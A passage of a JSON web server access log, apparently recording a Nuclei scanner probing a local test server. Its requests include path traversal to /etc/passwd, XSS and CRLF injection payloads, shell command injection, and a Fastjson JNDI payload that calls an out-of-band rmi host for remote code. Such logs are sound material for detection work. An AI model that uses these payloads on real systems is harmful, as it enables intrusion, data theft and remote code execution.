"request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /users.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/openstack/latest HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.263","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CgiStart?page=Single HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?api=%27%3E%22%3Csvg%2Fonload=confirm%28%27api%27%29%3E&api_key=%27%3E%22%3Csvg%2Fonload=confirm%28%27api_key%27%29%3E&begindate=%27%3E%22%3Csvg%2Fonload=confirm%28%27begindate%27%29%3E&callback=%27%3E%22%3Csvg%2Fonload=confirm%28%27callback%27%29%3E&categoryid=%27%3E%22%3Csvg%2Fonload=confirm%28%27categoryid%27%29%3E&csrf_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27csrf_token%27%29%3E&email=%27%3E%22%3Csvg%2Fonload=confirm%28%27email%27%29%3E&emailto=%27%3E%22%3Csvg%2Fonload=confirm%28%27emailto%27%29%3E&enddate=%27%3E%22%3Csvg%2Fonload=confirm%28%27enddate%27%29%3E&immagine=%27%3E%22%3Csvg%2Fonload=confirm%28%27immagine%27%29%3E&item=%27%3E%22%3Csvg%2Fonload=confirm%28%27item%27%29%3E&jsonp=%27%3E%22%3Csvg%2Fonload=confirm%28%27jsonp%27%29%3E&l=%27%3E%22%3Csvg%2Fonload=confirm%28%27l%27%29%3E&lang=%27%3E%22%3Csvg%2Fonload=confirm%28%27lang%27%29%3E&list_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27list_type%27%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/database.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /LTX_navi.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mappings HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?Page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&callback=%0D%0ASet-Cookie:crlfinjection=crlfinjection&checkout_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&content=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continue=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continueTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&counturl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&data=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&document=%0D%0ASet-Cookie:crlfinjection=crlfinjection&domain=%0D%0ASet-Cookie:crlfinjection=crlfinjection&done=%0D%0ASet-Cookie:crlfinjection=crlfinjection&download=%0D%0ASet-Cookie:crlfinjection=crlfinjection&feed=%0D%0ASet-Cookie:crlfinjection=crlfinjection&file=%0D%0ASet-Cookie:crlfinjection=crlfinjection&host=%0D%0ASet-Cookie:crlfinjection=crlfinjection&html=%0D%0ASet-Cookie:crlfinjection=crlfinjection&http=%0D%0ASet-Cookie:crlfinjection=crlfinjection&https=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&imageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&include=%0D%0ASet-Cookie:crlfinjection=crlfinjection&media=%0D%0ASet-Cookie:crlfinjection=crlfinjection&navigation=%0D%0ASet-Cookie:crlfinjection=crlfinjection&next=%0D%0ASet-Cookie:crlfinjection=crlfinjection&open=%0D%0ASet-Cookie:crlfinjection=crlfinjection&out=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&pageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&picture=%0D%0ASet-Cookie:crlfinjection=crlfinjection&port=%0D%0ASet-Cookie:crlfinjection=crlfinjection&proxy=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirectUri&redirectUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&reference=%0D%0ASet-Cookie:crlfinjection=crlfinjection&referrer=%0D%0ASet-Cookie:crlfinjection=crlfinjection&req=%0D%0ASet-Cookie:crlfinjection=crlfinjection&request=%0D%0ASet-Cookie:crlfinjection=crlfinjection&retUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return=%0D%0ASet-Cookie:crlfinjection=crlfinjection&returnTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&rurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&show=%0D%0ASet-Cookie:crlfinjection=crlfinjection&site=%0D%0ASet-Cookie:crlfinjection=crlfinjection&source=%0D%0ASet-Cookie:crlfinjection=crlfinjection&src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&target=%0D%0ASet-Cookie:crlfinjection=crlfinjection&to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&uri=%0D%0ASet-Cookie:crlfinjection=crlfinjection&url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&val=%0D%0ASet-Cookie:crlfinjection=crlfinjection&validate=%0D%0ASet-Cookie:crlfinjection=crlfinjection&view=%0D%0ASet-Cookie:crlfinjection=crlfinjection&window=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"29KD1uoGmEZbrilpxIYPTDzgWWA.tld","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/list HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20nuclei.txt%60 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/java.lang:type=Memory HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../example.com HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /services/pluginscript/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /default/en_US/frame.A100.html?sidebar=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?phpinfo=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/dump.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"{\x22conf\x22: {\x22message\x22: \x22\x5C\x22; touch test #\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /LICENSE.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?month=%27%3E%22%3Csvg%2Fonload=confirm%28%27month%27%29%3E&page_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27page_id%27%29%3E&password=%27%3E%22%3Csvg%2Fonload=confirm%28%27password%27%29%3E&terms=%27%3E%22%3Csvg%2Fonload=confirm%28%27terms%27%29%3E&token=%27%3E%22%3Csvg%2Fonload=confirm%28%27token%27%29%3E&type=%27%3E%22%3Csvg%2Fonload=confirm%28%27type%27%29%3E&unsubscribe_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27unsubscribe_token%27%29%3E&year=%27%3E%22%3Csvg%2Fonload=confirm%28%27year%27%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22com.sun.rowset.JdbcRowSetImpl\x22,\x0D\x0A \x22dataSourceName\x22:\x22rmi://ca28fg0smpvbd3qg07h0d3p1x7b1ghyjg.oast.live/Exploit\x22,\x0D\x0A \x22autoCommit\x22:true\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/mappings HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?Test=%0D%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.idea/httpRequests/http-requests-log.http HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nuclei.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/java.lang:type=Memory HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /services/pluginscript/..;/..;/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/namespaces HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/system/deviceinfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"Command=Diagnostic&traceMode=trace&reportIpOnly=0&pingPktSize=56&pingTimeout=30&pingCount=4&ipAddr=&maxTTLCnt=30&queriesCnt=;cat /etc/passwd&reportIpOnlyCheckbox=on&btnApply=Apply&T=1631653402928","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"http://127.0.0.1/diagnostic.html?t=201701020919", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/weekender/friend.php?id=MTA0&link=aHR0cHM6Ly9leGFtcGxlLmNvbQ== HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"{\x22O_\x22: \x22A\x22, \x22F_\x22: \x22EXEC_CMD\x22, \x22S_\x22: 123456789, \x22P1_\x22: {\x22Q\x22: \x22cat /etc/passwd\x22, \x22F\x22: \x22EXEC_CMD\x22}, \x22V_\x22: 1}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/libagent.cgi?type=J HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /emergency.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ioncube/loader-wizard.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read%3Csvg%20onload=alert%28document.domain%29%3E?mimeType=text/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", 